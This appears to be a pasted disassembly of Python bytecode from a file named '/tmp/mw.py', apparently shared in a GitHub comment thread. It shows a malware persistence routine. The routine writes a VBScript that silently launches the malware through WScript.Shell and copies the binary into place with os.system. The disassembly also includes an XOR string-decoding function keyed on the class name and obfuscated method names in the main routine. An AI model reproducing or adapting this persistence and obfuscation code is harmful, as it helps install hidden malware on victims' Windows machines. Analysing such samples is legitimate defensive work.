| 28 LOAD_GLOBAL 7 (inspect) | |
| 30 LOAD_METHOD 8 (currentframe) | |
| 32 CALL_METHOD 0 | |
| 34 LOAD_ATTR 9 (f_code) | |
| 36 LOAD_ATTR 10 (co_name) | |
| 38 CALL_METHOD 1 | |
| 40 CALL_METHOD 1 | |
| 42 POP_TOP | |
| 54 44 LOAD_GLOBAL 11 (os) | |
| 46 LOAD_ATTR 12 (path) | |
| 48 LOAD_METHOD 13 (exists) | |
| 50 LOAD_GLOBAL 14 (MALWARE_PATH) | |
| 52 CALL_METHOD 1 | |
| 54 POP_JUMP_IF_FALSE 72 | |
| 56 LOAD_GLOBAL 11 (os) | |
| 58 LOAD_ATTR 12 (path) | |
| 60 LOAD_METHOD 13 (exists) | |
| 62 LOAD_GLOBAL 15 (TRIGGER_PATH) | |
| 64 CALL_METHOD 1 | |
| 66 POP_JUMP_IF_FALSE 72 | |
| 55 68 LOAD_CONST 1 (True) | |
| 70 RETURN_VALUE | |
| 57 >> 72 LOAD_CONST 2 ('Set WshShell = WScript.CreateObject("WScript.Shell")\nWshShell.Run """{0}""", 0 , false') | |
| 74 LOAD_METHOD 16 (format) | |
| 76 LOAD_GLOBAL 14 (MALWARE_PATH) | |
| 78 CALL_METHOD 1 | |
| 80 STORE_FAST 3 (payload) | |
| 58 82 LOAD_GLOBAL 17 (open) | |
| 84 LOAD_GLOBAL 15 (TRIGGER_PATH) | |
| 86 LOAD_CONST 3 ('w') | |
| 88 CALL_FUNCTION 2 | |
| 90 SETUP_WITH 16 (to 108) | |
| 92 STORE_FAST 4 (f) | |
| 59 94 LOAD_FAST 4 (f) | |
| 96 LOAD_METHOD 18 (write) | |
| 98 LOAD_FAST 3 (payload) | |
| 100 CALL_METHOD 1 | |
| 102 POP_TOP | |
| 104 POP_BLOCK | |
| 106 BEGIN_FINALLY | |
| >> 108 WITH_CLEANUP_START | |
| 110 WITH_CLEANUP_FINISH | |
| 112 END_FINALLY | |
| 60 114 LOAD_GLOBAL 11 (os) | |
| 116 LOAD_METHOD 19 (system) | |
| 118 LOAD_CONST 4 ('copy %s %s') | |
| 120 LOAD_GLOBAL 20 (MALWARE_NAME) | |
| 122 LOAD_GLOBAL 14 (MALWARE_PATH) | |
| 124 BUILD_TUPLE 2 | |
| 126 BINARY_MODULO | |
| 128 CALL_METHOD 1 | |
| 130 POP_TOP | |
| 61 132 LOAD_CONST 5 (False) | |
| 134 RETURN_VALUE | |
| 136 LOAD_CONST 6 (None) | |
| 138 RETURN_VALUE | |
| Disassembly of NRYgDBImHhwT: | |
| 22 0 LOAD_FAST 0 (self) | |
| 2 LOAD_ATTR 0 (__class__) | |
| 4 LOAD_ATTR 1 (__name__) | |
| 6 LOAD_METHOD 2 (encode) | |
| 8 CALL_METHOD 0 | |
| 10 STORE_DEREF 1 (mask) | |
| 23 12 LOAD_GLOBAL 3 (len) | |
| 14 LOAD_DEREF 1 (mask) | |
| 16 CALL_FUNCTION 1 | |
| 18 STORE_DEREF 0 (lmask) | |
| 24 20 LOAD_GLOBAL 4 (bytes) | |
| 22 LOAD_CLOSURE 0 (lmask) | |
| 24 LOAD_CLOSURE 1 (mask) | |
| 26 BUILD_TUPLE 2 | |
| 28 LOAD_CONST 1 (<code object <genexpr> at 0x7f0a5361b190, file "/tmp/mw.py", line 24>) | |
| 30 LOAD_CONST 2 ('EdOxwEACgFH.NRYgDBImHhwT.<locals>.<genexpr>') | |
| 32 MAKE_FUNCTION 8 (closure) | |
| 34 LOAD_GLOBAL 5 (enumerate) | |
| 36 LOAD_FAST 1 (byt) | |
| 38 CALL_FUNCTION 1 | |
| 40 GET_ITER | |
| 42 CALL_FUNCTION 1 | |
| 44 CALL_FUNCTION 1 | |
| 46 RETURN_VALUE | |
| Disassembly of <code object <genexpr> at 0x7f0a5361b190, file "/tmp/mw.py", line 24>: | |
| 24 0 LOAD_FAST 0 (.0) | |
| >> 2 FOR_ITER 26 (to 30) | |
| 4 UNPACK_SEQUENCE 2 | |
| 6 STORE_FAST 1 (i) | |
| 8 STORE_FAST 2 (c) | |
| 10 LOAD_FAST 2 (c) | |
| 12 LOAD_DEREF 1 (mask) | |
| 14 LOAD_FAST 1 (i) | |
| 16 LOAD_DEREF 0 (lmask) | |
| 18 BINARY_MODULO | |
| 20 BINARY_SUBSCR | |
| 22 BINARY_XOR | |
| 24 YIELD_VALUE | |
| 26 POP_TOP | |
| 28 JUMP_ABSOLUTE 2 | |
| >> 30 LOAD_CONST 0 (None) | |
| 32 RETURN_VALUE | |
| Disassembly of main: | |
| 82 0 BUILD_LIST 0 | |
| 2 STORE_FAST 0 (my_returns) | |
| 83 4 LOAD_GLOBAL 0 (EdOxwEACgFH) | |
| 6 CALL_FUNCTION 0 | |
| 8 STORE_FAST 1 (x) | |
| 84 10 LOAD_FAST 0 (my_returns) | |
| 12 LOAD_METHOD 1 (append) | |
| 14 LOAD_FAST 1 (x) | |
| 16 LOAD_METHOD 2 (AC8AAxkqHjQGPxcvCzwdKGQ8) | |
| 18 CALL_METHOD 0 | |
| 20 CALL_METHOD 1 | |
| 22 POP_TOP | |
| 85 24 LOAD_FAST 0 (my_returns) | |
| 26 LOAD_METHOD 1 (append) | |
| 28 LOAD_FAST 1 (x) | |
| 30 LOAD_METHOD 3 (LQ0rHSgoIC8QJzog) | |
| 32 CALL_METHOD 0 | |
| 34 CALL_METHOD 1 | |
| 36 POP_TOP | |
| 86 38 LOAD_GLOBAL 4 (all) | |
| 40 LOAD_CONST 1 (<code object <genexpr> at 0x7f0a5361b660, file "/tmp/mw.py", line 86>) | |
| 42 LOAD_CONST 2 ('main.<locals>.<genexpr>') | |
| 44 MAKE_FUNCTION 0 | |
| 46 LOAD_FAST 0 (my_returns) | |
| 48 GET_ITER | |
| 50 CALL_FUNCTION 1 | |
| 52 CALL_FUNCTION 1 | |
| 54 POP_JUMP_IF_FALSE 64 | |
| 87 56 LOAD_FAST 1 (x) | |
| 58 LOAD_METHOD 5 (AwE5HQU2JDAPIyQp) | |
| 60 CALL_METHOD 0 | |
| 62 POP_TOP | |
| >> 64 LOAD_CONST 0 (None) | |
| 66 RETURN_VALUE | |
| Disassembly of <code object <genexpr> at 0x7f0a5361b660, file "/tmp/mw.py", line 86>: | |
| 86 0 LOAD_FAST 0 (.0) | |
| >> 2 FOR_ITER 14 (to 18) | |
| 4 STORE_FAST 1 (res) | |
| 6 LOAD_FAST 1 (res) | |
| 8 LOAD_CONST 0 (True) | |
| 10 COMPARE_OP 8 (is) | |
| 12 YIELD_VALUE | |
| 14 POP_TOP | |
| 16 JUMP_ABSOLUTE 2 | |
| >> 18 LOAD_CONST 1 (None) | |
| 20 RETURN_VALUE |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment